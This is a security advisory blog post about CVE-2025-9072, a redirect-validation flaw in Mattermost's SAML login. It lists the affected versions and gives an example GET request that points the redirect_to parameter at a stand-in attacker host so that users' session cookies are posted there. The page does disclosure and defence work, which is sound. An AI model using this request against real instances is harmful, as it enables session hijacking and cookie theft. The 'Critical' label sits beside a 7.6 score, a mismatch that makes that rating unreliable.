Ameeba Security Research

Defensive CVE and exploit intelligence

Ameeba Blog Search
TRENDING · 1 WEEK
Attack Vector
Vendor
Severity

CVE-2025-9072: Critical Redirect Validation Error in Mattermost Versions

Overview

This report covers the discovery and analysis of a serious vulnerability, CVE-2025-9072, affecting Mattermost versions 10.10.x <= 10.10.1, 10.5.x <= 10.5.9, 10.9.x <= 10.9.4. This flaw exposes systems to potential compromise and data leakage, highlighting the need for immediate patching. Vulnerability Summary

CVE ID: CVE-2025-9072
Severity: Critical (7.6 CVSS Score)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System compromise and data leakage through cookie theft

Affected Products

Product | Affected Versions

Ameeba Chat Icon A new way to communicate

Ameeba Chat is built on encrypted identity, not personal profiles.

Message, call, share files, and coordinate with identities kept separate.

  • • Encrypted identity
  • • Ameeba Chat authenticates access
  • • Aliases and categories
  • • End-to-end encrypted chat, calls, and files
  • • Secure notes for sensitive information

Private communication, rethought.

Mattermost | 10.10.x <= 10.10.1 Mattermost | 10.5.x <= 10.5.9 Mattermost | 10.9.x <= 10.9.4 How the Exploit Works

The vulnerability lies in the improper validation of the redirect_to parameter. An attacker can exploit this flaw by crafting a malicious link. Once a user authenticates with their SAML provider, the user’s cookies could be posted to an attacker-controlled URL, enabling possible system compromise and data leakage.

Conceptual Example Code

The following is a
conceptual
example of how the vulnerability might be exploited. This could be a sample HTTP request, where the redirect_to parameter is manipulated:

GET /login/sso/saml?redirect_to=https://attacker-controlled-url.com HTTP/1.1
Host: vulnerable-mattermost-instance.com

In this example, the user’s cookies would be posted to the attacker-controlled URL, potentially compromising the user’s session and any sensitive information contained within those cookies.

Want to discuss this further? Join the Ameeba Cybersecurity Group Chat.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.
Ameeba Chat